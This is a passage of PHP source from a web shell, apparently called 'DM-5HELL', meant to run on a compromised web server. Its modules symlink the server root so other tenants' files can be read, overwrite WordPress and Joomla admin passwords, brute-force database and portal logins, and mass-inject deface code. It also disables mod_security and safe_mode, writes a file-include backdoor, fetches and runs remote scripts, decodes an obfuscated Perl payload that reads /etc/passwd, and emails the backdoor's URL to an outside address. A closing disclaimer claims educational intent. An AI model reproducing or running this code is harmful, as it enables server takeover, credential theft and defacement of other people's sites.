  3718. <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
  3719. <td align="center"> <font color="white"> <b>_USERS_</b></td>
  3720. <td align="center"> <font color="white"> <b>_SYMLINK_</b></td>';
  3721. $named=file_get_contents("/etc/named.conf");
  3722. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
  3723. foreach($domains[1] as $domain) {
  3724. $domain=trim($domain);
  3725. $owner=posix_getpwuid(fileowner('/etc/valiases/'. $domain));
  3726. echo "<tr>
  3727. <td><a class='dm' href='http://".$domain." '>".$domain."</a></td>
  3728. <td align='center'><font color='white'>".$owner['name']."</font></td>
  3729. <td align='center'><a href='hacked/dm4sym/dm.txt".$owner['dir']."/public_html' target='_blank'>Symlink</a></td>";
  3730. }
  3731. flush();
  3732. flush();
  3733. }
  3734. echo "</tr></table>";
  3735.  
  3736. }elseif(isset($_GET['x'])&&($_GET['x']=='dmsym5')){
  3737. if($win) {
  3738. echo "<center><br/><br/><span class='b9'>Symlink Is Not Available In Windows Server</span><br/><br/></center>";
  3739. }
  3740. if(!is_dir('hacked')){
  3741. mkdir('hacked',0777);
  3742. }
  3743. chdir('hacked');
  3744. mkdir('dm5sym', 0777);
  3745. chdir('dm5sym');
  3746. $sempak="Options all\nDirectoryIndex dm.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nSatisfy Any";
  3747. simpan('.htaccess',$sempak);
  3748. symlink('/','dm.txt');
  3749. $read_named_conf=@file('/etc/named.conf');
  3750. if(!$read_named_conf) {
  3751. echo "<center><br/><br/><span class='b9'>Can't Read File etc/named.conf :(</span><br/><br/>";
  3752. }else{
  3753. echo "<center><br/><br/><b><span class='b7'>O=:[ SYMLINK ETC/NAMED.CONF II ]:=O</span></b><br/><br/>
  3754. <table border='1' width='400' cellpadding='1' cellspacing='4' style='border-collapse: collapse'>
  3755. <td align='center'> <font color='white'> <b>_DOMAINS_</b></td>
  3756. <td align='center'> <font color='white'> <b>_USERS_</b></td>
  3757. <td align='center'> <font color='white'> <b>_SYMLINK_</b></td>";
  3758. foreach($read_named_conf as $subject) {
  3759. if(preg_match('/zone/',$subject)) {
  3760. preg_match_all('#zone"(.*)"#',$subject,$string);
  3761. flush();
  3762. if(strlen(trim($string[1][0]))>2) {
  3763. $UID=posix_getpwuid(fileowner('/etc/valiases/'.$string[1][0]));
  3764. $name=$UID['name'];
  3765. symlink('/','dm5sym/dm.txt');
  3766. $name=$string[1][0];
  3767. $australia='\.au';
  3768. $bangladesh='\.bd';
  3769. $brazil='\.br';
  3770. $malaysia='\.my';
  3771. $myanmar='\.mm';
  3772. $indonesia='\.id';
  3773. $israel='\.il';
  3774. $romania='\.ro';
  3775. $edu='\.edu';
  3776. $gov='\.gov';
  3777. $go='\.go';
  3778. $gob='\.gob';
  3779. $mil='\.mil';
  3780. if(preg_match("$australia",$string[1][0])or preg_match("$bangladesh",$string[1][0])or preg_match("$brazil",$string[1][0])or preg_match("$malaysia",$string[1][0])or preg_match("$myanmar",$string[1][0])or preg_match("$indonesia",$string[1][0])or preg_match("$israel",$string[1][0])or preg_match("$romania",$string[1][0])or preg_match("$edu",$string[1][0])or preg_match("$gov",$string[1][0])or preg_match("$go",$string[1][0])or preg_match("$gob",$string[1][0])or preg_match("$mil",$string[1][0])or preg_match("$mil2",$string[1][0])) {
  3781. $name="<div style=' color:yellow ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  3782. }
  3783. echo "<tr>
  3784. <td><a class='dm' target='_blank' href=http://".$string[1][0].'/>'.$name.' </a></center></div></td>
  3785. <td align=center><font color=white>'.$UID['name']."</td>
  3786. <td align=center><a href='hacked/dm5sym/dm.txt/home/".$UID['name']."/public_html/' target='_blank'>Symlink </a></td></tr>";
  3787. flush();
  3788. }
  3789. }
  3790. }
  3791. }
  3792. flush();
  3793. flush();
  3794. echo "</tr></table></div>";
  3795.  
  3796. }elseif(isset($_GET['x'])&&($_GET['x']=='dmsym6')){
  3797. if($win) {
  3798. echo "<center><br/><br/><span class='b9'>Symlink Is Not Available In Windows Server</span><br/><br/></center>";
  3799. }
  3800. if(!is_dir('hacked')){
  3801. mkdir('hacked',0777);
  3802. }
  3803. chdir('hacked');
  3804. mkdir('dm6sym', 0777);
  3805. chdir('dm6sym');
  3806. $sempak="Options all\nDirectoryIndex dm.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nSatisfy Any";
  3807. simpan('.htaccess',$sempak);
  3808. symlink('/','dm.txt');
  3809. if(is_readable("/etc/valiases")) {
  3810. echo '<center><br/><br/><b><span class="b7">O=:[ SYMLINK ETC/VALIASES ]:=O</span></b><br/><br/>
  3811. <table align="center" border="1" width="300" cellspacing="1" cellpadding="4" style="border-collapse: collapse">';
  3812. echo '<tr>
  3813. <td align="center"><font color="white"> <b>_DOMAINS_</b></td>
  3814. <td align="center"><font color="white"> <b>_USERS_</b></td>
  3815. <td align="center"><font color="white"> <b>SYMLINK</b></td>';
  3816. $list=scandir("/etc/valiases");
  3817. foreach($list as $domain) {
  3818. $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain));
  3819. echo "<tr>
  3820. <td><a class='dm' href='http://".$domain." '>".$domain."</a></td>
  3821. <td align='center'><font color='white'>".$owner['name']."</font></td>
  3822. <td align='center'><a href='hacked/dm6sym/dm.txt".$owner['dir']."/public_html' target='_blank'>Symlink</a></td>";
  3823. }
  3824. flush();
  3825. flush();
  3826. }
  3827. echo "</tr></table></div>";
  3828.  
  3829. }elseif(isset($_GET['x'])&&($_GET['x']=='wp3')){
  3830. echo "<center><br/><br/><b><span class='b7'>O=:[ WORDPRESS PASS CHANGER ]:=O</span></b><br/><br/> ";
  3831. if(empty($_POST['pwd'])){
  3832. echo "<FORM method='POST'>
  3833. <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  3834. <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  3835. <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  3836. <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  3837. <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
  3838. <tr><td>&nbsp;&nbsp;User baru</td><td>
  3839. <input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
  3840. <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
  3841. <input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;
  3842. <input style='width:19%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
  3843. </td></tr> </table><br><br><br><br>";
  3844. }else{
  3845. $localhost=$_POST['localhost'];
  3846. $database=$_POST['database'];
  3847. $username=$_POST['username'];
  3848. $password=$_POST['password'];
  3849. $pwd=$_POST['pwd'];
  3850. $admin=$_POST['admin'];
  3851. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  3852. @mysql_select_db($database) or die(mysql_error());
  3853. $hash=crypt($pwd);
  3854. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
  3855. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
  3856. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
  3857. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
  3858. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
  3859. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
  3860. $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
  3861. if($a4s){
  3862. echo "<br><br><b><span class='b11'> Password Change Successfully</span></b><br/>";
  3863. }
  3864. }
  3865. echo "</div>";
  3866. }elseif(isset($_GET['x'])&&($_GET['x']=='jm4')){
  3867. echo "<center><br/><br/><b><span class='b7'>O=:[ JOOMLA PASS CHANGER ]:=O</span></b><br/><br/> ";
  3868. if(empty($_POST['pwd'])){
  3869. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  3870. <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
  3871. <tr><td>&nbsp;&nbsp;Database</td><td>
  3872. <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr>
  3873. <tr><td>&nbsp;&nbsp;username</td><td>
  3874. <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr>
  3875. <tr><td>&nbsp;&nbsp;password</td><td>
  3876. <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
  3877. <tr><td>&nbsp;&nbsp;New User</td><td>
  3878. <input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
  3879. <tr><td>&nbsp;&nbsp;New Pass </td>
  3880. <td>123456 = <input style='width:160px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;</td></tr>
  3881. <tr><td><input style='width:130%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
  3882. </td></tr></table><br>";
  3883. }else{
  3884. $localhost=$_POST['localhost'];
  3885. $database=$_POST['database'];
  3886. $username=$_POST['username'];
  3887. $password=$_POST['password'];
  3888. $pwd=$_POST['pwd'];
  3889. $admin=$_POST['admin'];
  3890. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  3891. @mysql_select_db($database) or die(mysql_error());
  3892. $hash=crypt($pwd);
  3893. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
  3894. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
  3895. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
  3896. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
  3897. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
  3898. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
  3899. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
  3900. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
  3901. if($SQL){
  3902. echo "<br><br><b><span class='b11'> Password Change Successfully</span></b><br/>";
  3903. }
  3904. }
  3905. echo "</div>";
  3906. }elseif(isset($_GET['x'])&&($_GET['x']=='cgi2012')){
  3907. echo "<center><br/><br/><b><span class='b7'>O=:[ CGI TELNET</span> <span class='b8'> 2012 ]:=O</span></b><br />";
  3908.  
  3909. if(!is_dir('telnet')){
  3910. mkdir('telnet',0777);
  3911. chdir('telnet');
  3912. }
  3913. simpan('.htaccess','AddHandler cgi-script .cok .pl .cgi');
  3914. $etcpl=base64_decode('IyEvdXNyL2Jpbi9wZXJsCiMKIyAgIENnaSBFbmNvZGVyIEJ5IEVkZGllIEtpZGl3CiMgICBDZ2kg
  3915. RW5jb2RlciBWIDEuMC4wIGJldGEKIyAgIElwOiAzNi43MS4xNTcuNAojICAgSG9zdCBOYW1lOiAK
  3916. IyAgIENpdHk6IEpha2FydGEKIyAgIENvdW50cnk6IElECiMgICBSZWdpb246IEpha2FydGEKIyAg
  3917. IElzcDogQVMxNzk3NCBQVCBUZWxla29tdW5pa2FzaSBJbmRvbmVzaWEKIyAgIFlvdXIgQnJvd3Nl
  3918. cjogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBydjo1NS4wKSBHZWNrby8yMDEwMDEwMSBG
  3919. aXJlZm94LzU1LjAKIyAgIERhdGU6IFNlbmluIDI1LVNlcHRlbWJlci0yMDE3IDE3OjQxOjMwCiMK
  3920. dXNlCk1JTUU6OkJhc2U2NDsKZXZhbChkZWNvZGVfYmFzZTY0KCdJeUV2ZFhOeUwySnBiaTl3WlhK
  3921. c0lDMVhDaVJoUFNJdlpYUmpMM0JoYzNOM1pDSTdDaVJrUFNJdlpYUmpMM0JoYzNOM1pDMGlPd29r
  3922. CllqMGlaWFJqTFhCaGMzTjNaQzUwZUhRaU93b2taVDBpWlhSakxYQmhjM04zWkMwdWRIaDBJanNL
  3923. Y0hKcGJuUWlRMjl1ZEdWdWRDMTAKZVhCbE9pQjBaWGgwTDJoMGJXeGNibHh1SWpzS0pHTTljM2x0
  3924. YkdsdWF5Z2tZU3drWWlrN0NpUm1QWE41Yld4cGJtc29KR1FzSkdVcApPd3BwWmlna1l6MDlNU2w3
  3925. Q25CeWFXNTBJQ1JpTGljZ2MzbHRiR2x1YXlCRGNtVmhkR1ZrSUZOMVkyTmxjM05tZFd4c2VTQXVJ
  3926. QzRnCkxpQThZbkkrUEdFZ2FISmxaajBpWlhSakxYQmhjM04zWkM1MGVIUWlQbVYwWXlCd1lYTnpk
  3927. MlE4TDJFK0p6c0tmV1ZzYzJWN0NuQnkKYVc1MElDZERZVzV1YjNRZ1UzbHRiR2x1YXlBbkxpUmhM
  3928. aWNnYjNJZ1JtbHNaU0FuTGlSaUxpY2dRV3h5WldGa2VTQkZlR2x6ZEhNZwpMaUF1SUM0bk95QUtm
  3929. UT09JykpOw==');
  3930. simpan('etc.pl',$etcpl);
  3931. chmod('etc.pl',0755);
  3932.  
  3933. $file=toolurl('http://dl.dropbox.com/s/6nyqs5mpj798q2h/telnet.txt');
  3934. simpan('telnet.cok',$file);
  3935. chmod("telnet.cok",0755);
  3936. echo "<center><span class='b7'>Generate file telnet.cok succesfully</span><br/></center>";
  3937. echo "<iframe src='telnet/telnet.cok' width=96% height=76% frameborder=0></iframe></div>";
  3938. echo "<br/><br /><center><b><span class='b11'> You Can Go To:<a href='telnet/telnet.cok' target='_blank'>[+] HERE [+]</a></center></span></br>";
  3939. }elseif(isset($_GET['x'])&&($_GET['x']=='mysql2')){
  3940. echo "<center><br/><br/><b><span class='b7'>O=:[ MYSQL MANAGER ]:=O</span></b><br/><br/> ";
  3941. echo "</br></br><center><b><span class='b11'> You Can Go To:<a href='angel/db.php' target='_blank'>[+] HERE [+]</a></center></span></br>";
  3942. if(!is_dir('angel')){
  3943. mkdir('angel',0777);
  3944. chdir('angel');
  3945. }
  3946. $file=toolurl('http://dl.dropbox.com/s/14vmtzh23d1e2p3/mysql.txt');
  3947. simpan('db.php',$file);
  3948. chmod("db.php",0755);
  3949. echo "<center><span class='b7'>Generate file db.php succesfully</span><br/></center>";
  3950.  
  3951. }elseif(isset($_GET['x'])&&($_GET['x']=='ckperl')){
  3952. echo "<center><br/><br/><b><span class='b7'>O=:[ PERL CONFIG KILLER ]:=O</span></b><br/><br/> ";
  3953. echo "</br></br><center><b><span class='b11'> You Can Go To:<a href='ckperl/anu.pl' target='_blank'>[+] HERE [+]</a></center></span></br>";
  3954. if(!is_dir('ckperl')){mkdir('ckperl',0777);chdir('ckperl');}
  3955. $file=toolurl('http://dl.dropbox.com/s/epcf4o8tral5huw/config.txt');
  3956. simpan('anu.pl',$file);
  3957. chmod("anu.pl",0755);
  3958. $c="Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nAddHandler cgi-script .pl\nSatisfy Any";
  3959. simpan('.htaccess',$c);
  3960. echo "<center><span class='b7'>Generate file anu.pl succesfully</span><br/></center><br />";
  3961. echo "<br /><center><iframe src='ckperl/anu.pl' width=96% height=126% frameborder=0></iframe><br />";
  3962.  
  3963. }elseif(isset($_GET['x'])&&($_GET['x']=='dmwp')){
  3964. echo '<center><br/><br/><img src="https://s.w.org/style/images/wp-header-logo.png"><br/><br/> <b><span class="b7">O=:[ WORDPRESS HACK TOOLS ]:=O</span></b><br/><br/>
  3965. <div id="menu" align="center"><table><tr>
  3966. <td align=center><b><a href="?dm='.$pwd.'&amp;x=wp1">WP BRUTEFORCE</a></b></td>
  3967. <td align=center><b><a href="?dm='.$pwd.'&amp;x=wp2">WP AUTO DEFACE</a></b></td>
  3968. <td align=center><b><a href="?dm='.$pwd.'&amp;x=wp3">WP PASSWORD CHANGER</a></b></td>
  3969. </tr></table></div><br/>';
  3970. }elseif(isset($_GET['x'])&&($_GET['x']=='dmvb')){
  3971. echo '<center><br/><br/>
  3972. <img src="http://forum.paradoxplaza.com/forum/images/mobile/vbulletin-logo.png"><br/><br/><b><span class="b7">O=:[ VBULLETIN HACK TOOLS ]:=O</span></b><br/><br/>
  3973. <div id="menu" align="center"><table><tr>
  3974. <td align=center><b><a href="?dm='.$pwd.'&amp;x=vb1">VB INDEX CHANGER</a></b></td>
  3975. <td align=center><b><a href="?dm='.$pwd.'&amp;x=vb2">VB PASSWORD CHANGER</a></b></td>
  3976. </tr></table></div><br/>';
  3977. }elseif(isset($_GET['x'])&&($_GET['x']=='dmjm')){
  3978. echo '<center><br/><br/><img src="https://cdn.joomla.org/images/site_header.png"><br/><br/> <b><span class="b7">O=:[ JOOMLA HACK TOOLS ]:=O</span></b><br/><br/>
  3979. <div id="menu" align="center"><table><tr>
  3980. <td align=center><b><a href="?dm='.$pwd.'&amp;x=jm1">BRUTEFORCE LOGIN</a></b></td>
  3981. <td align=center><b><a href="?dm='.$pwd.'&amp;x=jm2">INDEX DEFACE</a></b></td>
  3982. <td align=center><b><a href="?dm='.$pwd.'&amp;x=jm3">JCE UPLOADER</a>
  3983. </b></td>
  3984. <td align=center><b><a href="?dm='.$pwd.'&amp;x=jm4">PASSWORD CHANGER</a></b></td>
  3985. </tr></table></div><br/>';
  3986. }elseif(isset($_GET['x'])&&($_GET['x']=='whmcs2')){
  3987. echo '<center><br/><br/><img src="http://www.whmcs.com/images/logo_whmcs.png"><br/>
  3988. <br/><b><span class="b7">O=:[ WHMCS HACK TOOLS ]:=O</span></b><br/><br/>
  3989. <div id="menu" align="center"><table><tr>
  3990. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs1">GRAB PASSWORD CLIENT</a></b></td>
  3991. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs2">INJECT SHELL</a></b></td>
  3992. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs3">PASSWORD CHANGER</a></b></td>
  3993. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs4">BYPASS AUTH LOGIN</a></b></td>
  3994. </tr></table></div>
  3995. <div id="menu" align="center"><table><tr>
  3996. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs5">WHMCS 5.2.7 [php]</a></b></td>
  3997. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs6">WHMCS 5.2.7 [python]</a></b></td>
  3998. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs7">WHMCS 5.2.8 [php]</a></b></td>
  3999. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs8">WHMCS 5.2.8 [python]</a></b></td>
  4000. </tr></table></div>
  4001. <div id="menu" align="center"><table><tr>
  4002. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs9">CHECK LICENSE & VERSION</a></b></td>
  4003. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs10">v5.2.7 VULN SCANNER</a></b></td>
  4004. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs11">SCAN CMS WHMCS</a></b></td>
  4005. </table></div>
  4006. <div id="menu" align="center"><table><tr>
  4007. <td align=center><b><a href="?dm='.$pwd.'&amp;x=whmcs1">WHMCS DECODER MYSQL</a></b></td>
  4008. <td align=center><b><a href="?dm='.$pwd.'&amp;x=whmcsphp7">WHMCS DECODER MYSQLI</a></b></td>
  4009. </table></div><br/>';
  4010. }elseif(isset($_GET['x'])&&($_GET['x']=='cpanel')){
  4011. echo '<center><br/><br/><img src="http://earthnexus.com/images/cpanel_logo.gif"><br/><br/> <b><span class="b7">O=:[ CPANEL HACK TOOLS ]:=O</span></b><br/><br/>
  4012. <div id="menu" align="center"><table><tr>
  4013. <td align=center><b><a href="?dm='.$pwd.'&amp;x=cp1">BRUTEFORCE CP LOGIN</a></b></td>
  4014. <td align=center><b><a href="?dm='.$pwd.'&amp;x=cp2">BRUTEFORCE CP AUTO DEFACE</a></b></td>
  4015. <td align=center><b><a href="?dm='.$pwd.'&amp;x=cp3">BRUTEFORCE CONFIG CP </a></b></td>
  4016. </tr></table></div><br/>';
  4017. }elseif(isset($_GET['x'])&&($_GET['x']=='iis7')){
  4018. echo '<center><br/><br/><img src="http://www.codeblog.co.uk/wp-content/uploads/2010/06/iis7-300x215.jpg"><br/><br/> <b><span class="b7">O=:[ WINDOWS IIS7.5 HACK TOOLS ]:=O</span></b><br/><br/>
  4019. <div id="menu" align="center"><table><tr>
  4020. <td align=center><b><a href="?dm='.$pwd.'&amp;x=iis7httpd">HTTPD EXPLOIT</a></b></td>
  4021. <td align=center><b><a href="?dm='.$pwd.'&amp;x=iis7port">PORT EXPLOIT</a></b></td>
  4022. </tr></table></div><br/>';
  4023. }elseif(isset($_GET['x'])&&($_GET['x']=='posisi')){
  4024. $toe='Eddie Kidiw <eddiekidiw@gmail.com>';
  4025. $votremail=$_SERVER['SERVER_ADMIN'];
  4026. $objet='BACKDOOR SHELL';
  4027. $headers="From: Cyduk Cok <".$votremail.">\r\n"."Reply-To: Fake Email <".$votremail.">\r\n".'Subject:'.$objet."\r\n".'Content-type:text/plain;charset=iso-8859-1'."\r\n".'Sent:'.date('l, F d, Y H:i');
  4028. if(mail($toe,$objet,curPageURL(),$headers)){
  4029. //header('Location: http://'.$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']);
  4030. echo'<meta http-equiv="refresh" content="0; url='.lokasi.'" />';
  4031. }else{
  4032. echo "<br><center><font size=4 color=red>Error Saving Backdoor</font><center>";
  4033. }
  4034. }elseif(isset($_GET['x'])&&($_GET['x']=='inject')){
  4035. echo'<form action="?dm='.$pwd.'&amp;x=inject" method="post">
  4036. <input type="hidden" name="injector"/>
  4037. <center><table id="margins" >
  4038. <tr><td width="30" class="title">
  4039. DIR: <input class="inputz" name="pathtomass" value="'.$pwd.'"/></td></tr>
  4040. <tr><td class="title">
  4041. Mode:<select class="inputz" name="mode" style="width:130px;">
  4042. <option value="Apender">SEMI INJECT</option>
  4043. <option value="Overwriter">FULL Inject</option>
  4044. </select></td></tr>
  4045. <tr><td class="title">
  4046. File Type:<input type="text" class="inputz" name="filetype" value=".php" onBlur="if(this.value==\'\')this.value=\'.php\';"/></td></tr>
  4047. <tr><td colspan="2">
  4048. <textarea name="injectthis" class="inputz">
  4049. '.base64_decode("PGh0bWw+DQo8aGVhZD48dGl0bGU+Li9INENLM0QgQlkgRzRudDNuRzNyejwvdGl0bGU+PC9oZWFkPg0KPGJvZHk+DQpURVJJTUEgS0FTSUggR1VFIEdBTlRFTkcgOnYNCjwvYm9keT4NCjwvaHRtbD4=").'
  4050. </textarea></td></tr>
  4051. <tr><td rowspan="2">
  4052. <input type="submit" class="inputz" value=" INJECT CODE :P "/></td></tr>
  4053. </form></table></center>';
  4054. }elseif(isset($_GET['x'])&&($_GET['x']=='bruteforce')){
  4055. $f=@fopen('users.txt','w');
  4056. if(!$users=get_users()) {
  4057. echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>";
  4058. }else{
  4059. foreach($users as $user) {
  4060. @fwrite($f,$user);
  4061. @fwrite($f, "\n");
  4062. }
  4063. }
  4064. echo '<br><center><font size=3 color=green>[+] BUKA users.txt <a href=dmshell.txt target=blank>_DISINI_</a> COPY & PASTE DI KOLOM USER [+]</font></center><BR>
  4065. <form method="POST" target="_self">
  4066. <input name="page" type="hidden" value="find">
  4067. <table width="33%" cellpadding="3" cellspacing="1" align="center">
  4068. <tr><td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  4069. <strong>User :</strong></td>
  4070. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea class="inputz" cols="40" rows="10" name="usernames"></textarea></strong></td></tr>
  4071. <tr><td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  4072. <strong>Pass :</strong></td>
  4073. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea class="inputz" cols="40" rows="10" name="passwords"></textarea></strong></td></tr>
  4074. <tr><td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  4075. <strong>Type :</strong></td>
  4076. <td valign="top" bgcolor="#151515" colspan="5">
  4077. <span class="style2"><strong>Simple:</strong> </span>
  4078. <strong>
  4079. <input class="inputz" type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  4080. <font class="style2"><strong>/etc/passwd:</strong> </font>
  4081. <strong>
  4082. <input class="inputz" type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  4083. </strong>
  4084. </span></td></tr>
  4085. <tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>
  4086. <td valign="top" bgcolor="#151515" colspan="5"><strong><input class="inputz" type="submit" value="_START CRACK _"></strong>
  4087. </td><tr></form>';
  4088.  
  4089. if(isset($_POST['usernames'])&&isset($_POST['passwords'])) {
  4090. if($_POST['type']=='passwd') {
  4091. $e=explode("\n",$_POST['usernames']);
  4092. foreach($e as $value) {
  4093. $k=explode(":",$value);
  4094. $username.=$k['0']." ";
  4095. }
  4096. }elseif($_POST['type']=='simple') {
  4097. $username=str_replace("\n",' ',$_POST['usernames']);
  4098. }
  4099. $a1=explode(" ",$username);
  4100. $a2=explode("\n",$_POST['passwords']);
  4101. $id2=count($a2);
  4102. $ok=0;
  4103. foreach($a1 as $user) {
  4104. if($user!=='') {
  4105. $user=trim($user);
  4106. for($i=0; $i<=$id2; $i++) {
  4107. $pass=trim($a2[$i]);
  4108. if(@mysql_connect('localhost',$user,$pass)) {
  4109. echo "[+] Username ( <b><font color=green>$user</font></b> ) Password ( <b><font color=green>$pass</font></b> ) [+]<br />";
  4110. $ok++;
  4111. }
  4112. }
  4113. }
  4114. }
  4115. echo "<hr><b>DAPAT <font color=green>$ok</font> Cpanel</b>";
  4116. echo "<center><b><a href=".PHPSELF.">BACK</a>";
  4117. exit;
  4118. }
  4119. }elseif(isset($_GET['x'])&&($_GET['x']=='safemodeoff')){
  4120. simpan(".htaccess","<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
  4121. simpan("ini.php","<?php\necho ini_get(\"safe_mode\");\necho ini_get(\"open_basedir\");\ninclude(\$_GET[\"file\"]);\nini_restore(\"safe_mode\");\nini_restore(\"open_basedir\");\necho ini_get(\"safe_mode\");\necho ini_get(\"open_basedir\");\ninclude(\$_GET[\"ss\"]);\n?>");
  4122. echo"<center><br/><br/><b><span class='b7'>O=:[ BYPASS SAFE MODE ]:=O</span></b><br/><br/><span class='b9'>Generate htaccess & ini.php & php.ini Successfully :)</span><br/><br/><br/></center>";
  4123. simpan('php.ini',"safe_mode=OFF\nsafe_mode_gid=OFF\ndisable_functions=NONE\ndisable_classes=NONE\nopen_basedir=OFF\nsuhosin.executor.func.blacklist=NONE");
  4124. }elseif(isset($_GET['x'])&&($_GET['x']=='arabportal')){
  4125. echo'<form action="?dm='.$pwd.'&amp;x=arabportal" method="post">';
  4126. echo "<center><br/><br/><b><span class='b7'>O=:[ BRUTEFORCE ARAB PORTAL ]:=O</span></b><br/><br/></center><form method='POST'>
  4127. <p align='center' dir='ltr'>&nbsp;<input type='text' value='http://target.com/arabportal/' name='target' size='45'>
  4128. <input type='text' value='admin' name='username'>
  4129. <br><input type='submit' value='Start Brute'>
  4130. </p>";
  4131. $site=$_POST['target']."/admin/";
  4132. $username=$_POST['username'];
  4133. $passwords=array('123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012');
  4134. foreach($passwords as $password){
  4135. brute($site,$username,$password);
  4136. }
  4137. echo "</form>";
  4138. }elseif(isset($_GET['x'])&&($_GET['x']=='about')){
  4139. echo'<form action="?dm='.$pwd.'&amp;x=about" method="post">';
  4140. echo "<div align='center'><br><br>
  4141. <table class='tabnet' style='padding:0 1px; style=border-collapse: collapse'>
  4142. <tr><th align='center'><b>DISCLAIMER</b></th></tr>
  4143. <tr><td align='left'>THIS TOOL WAS WRITTEN FOR EDUCATIONAL PURPOSES.</td></tr>
  4144. <tr><td align='left'>ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST.</td></tr>
  4145. <tr><td align='left'>IF YOU DON'T AGREE WITH WHAT I SAID, PLEASE DON'T USE THIS TOOL.</td></tr>
  4146. <tr><td align='left'>THE AUTHOR CANNOT AND WILL NOT IN ANY WAY LIABLE FOR ANY LOSS OR DAMAGE ARISING WITH THE USE OF THIS TOOL.</td></tr>
  4147. <tr><td align='left'>USE IT UNDER YOUR OWN RISK !!!!!!</td></tr>
  4148. <tr><td align='left'>THANKS...</td></tr>
  4149. </table><br><br>
  4150. <div align='center'><br><br>
  4151. <table bordercolor='#444' class='tabnet' style='padding:0 1px; style=border-collapse: collapse'>
  4152. <tr><th align='center'><b>ABOUT DM-5HELL</b></th></tr><tr><td>
  4153. <table border=1 style='border-collapse: collapse'>
  4154. <tr><td>Author</td><td>Andripzf</td></tr>
